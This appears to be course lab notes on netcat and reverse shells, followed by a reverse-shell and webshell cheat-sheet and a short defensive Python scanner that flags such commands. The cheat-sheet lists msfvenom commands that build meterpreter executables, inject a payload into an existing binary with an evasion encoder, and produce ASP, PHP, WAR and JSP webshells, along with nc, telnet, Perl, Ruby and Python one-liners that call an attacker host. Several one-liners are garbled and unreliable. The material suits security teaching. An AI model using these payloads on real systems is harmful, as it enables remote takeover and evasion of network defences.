Type ifconfig in the server window to determine the server's IP address. Now ping the server from the client to be sure the connection is established. In a terminal window on the client type:

    ping server_ip_address

You should see a report of the time it takes for messages to go from the client to the server and back.

In a terminal on the server set up a TCP connection on port 9090 using the netcat command:

    nc -l 9090 -v

(You can find more info about the netcat command here: )

As you probably recall from cs105, communicating between the client and server is simply a matter of writing to the appropriate file. From the client command line type:

    echo hello > /dev/tcp/server_ip_address/9090

(Note that the listener closed down after receiving the hello message.) On the client type:

    /bin/bash > /dev/tcp/server_ip_address/9090

What happened? Can you explain why it happened?

This is a great collection of different types of reverse shells and webshells. Many of the ones listed below come from this cheat-sheet:

There is an important difference between a non-staged and a staged payload. A non-staged shell is sent over in one block. This can be caught with the Metasploit multi-handler. A staged payload, by contrast, first sends some parts of it and sets up the connection, and then it sends some more. This can be useful when you have a very small buffer for your shellcode, so you need to divide up the payload. This can be caught with the Metasploit multi-handler but not with netcat.

Standard meterpreter

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe

Set payload windows/meterpreter/reverse_tcp

    msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe

It makes the meterpreter traffic look normal. Since it is hidden in HTTPS the communication is encrypted and can be used to bypass deep-packet inspection.

Non-staged payload

    msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe

Staged payload

    msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

Inject payload into binary

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

Netcat, with -e flag

    nc -e /bin/sh ATTACKING-IP 80

Netcat, without -e flag

    rm -f /tmp/p mknod /tmp/p p & nc ATTACKING-IP 4444 0/tmp/p

Upgrade Netcat shell to an interactive:

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentest job you might not want to communicate unencrypted.

Bind

    ncat -exec cmd.exe -allow 192.168.1.101 -vnl 5555 -ssl

Telnet

    rm -f /tmp/p mknod /tmp/p p & telnet ATTACKING-IP 80 0/tmp/p

Telnet

    Telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl

    perl -e 'use Socket $i="ATTACKING-IP" $p=80 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))) '

Ruby

    ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

Python

    python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("ATTACKING-IP",80)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() '

You can use it on both Linux and Windows.

ASP

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp

PHP

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php

WAR

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war

JSP

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.
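As an added, defender-side example (not part of the cheat-sheet above): a small Python scanner that flags the command shapes listed on this page (a shell redirected into /dev/tcp, nc with -e, a mknod FIFO feeding netcat or telnet, a socket-plus-dup2 one-liner, an msfvenom build) in command-log lines. The log format, user names and addresses are constructed assumptions, not output of any real collector.

```python
import re
from typing import List, Tuple

# Constructed sample lines (not from any real system), shaped like what a
# shell-history forwarder or auditd execve collector might ship to a SIEM.
SAMPLE_LINES = [
    "user=alice cmd='ls -la /var/log'",
    "user=alice cmd='nc -l 9090 -v'",
    "user=bob cmd='echo hello > /dev/tcp/10.0.0.5/9090'",
    "user=bob cmd='/bin/bash > /dev/tcp/10.0.0.5/9090'",
    "user=www-data cmd='rm -f /tmp/p; mknod /tmp/p p; nc 10.0.0.5 4444'",
    "user=www-data cmd='nc -e /bin/sh 10.0.0.5 80'",
    "user=ci cmd='python -c \"import socket,os; os.dup2(s.fileno(),0)\"'",
    "user=ci cmd='msfvenom -p windows/meterpreter/reverse_tcp -f exe'",
]

# (rule name, severity, pattern). Severity 3 = a shell handed to a socket,
# 2 = building blocks for one, 1 = payload tooling or a lab-style probe.
RULES: List[Tuple[str, int, re.Pattern]] = [
    ("shell-to-dev-tcp", 3, re.compile(r"\b(ba)?sh\b[^']*>\s*/dev/tcp/\S+/\d+")),
    ("dev-tcp-write", 1, re.compile(r"/dev/tcp/\S+/\d+")),
    ("netcat-exec-flag", 3, re.compile(r"\b(nc|ncat|netcat)\b[^']*\s-e\s")),
    ("fifo-with-netcat", 2, re.compile(r"\bmknod\s+\S+\s+p\b[^']*\b(nc|ncat|telnet)\b")),
    ("socket-dup2", 2, re.compile(r"\bsocket\b[^']*\bdup2\b")),
    ("msfvenom-build", 1, re.compile(r"\bmsfvenom\b[^']*\s-p\s+\S+")),
]

LINE_RE = re.compile(r"user=(\S+) cmd='(.*)'$")  # assumed log layout

def classify(cmd: str) -> Tuple[int, List[str]]:
    """Return (highest severity, matched rule names) for one command."""
    hits = [name for name, _sev, pat in RULES if pat.search(cmd)]
    if "shell-to-dev-tcp" in hits:      # the specific rule subsumes the generic one
        hits.remove("dev-tcp-write")
    sev = max((s for n, s, _ in RULES if n in hits), default=0)
    return sev, hits

def scan(lines: List[str], min_severity: int = 2) -> List[Tuple[str, int, List[str]]]:
    """Return (user, severity, rules) for every line at or above min_severity."""
    findings = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue                     # skip lines that do not fit the layout
        sev, hits = classify(m.group(2))
        if sev >= min_severity:
            findings.append((m.group(1), sev, hits))
    return findings
```

The lab's `echo hello > /dev/tcp/...` probe scores 1 and is filtered out at the default threshold, while `/bin/bash > /dev/tcp/...` scores 3; lower `min_severity` to 1 to see the probes and the msfvenom build as well.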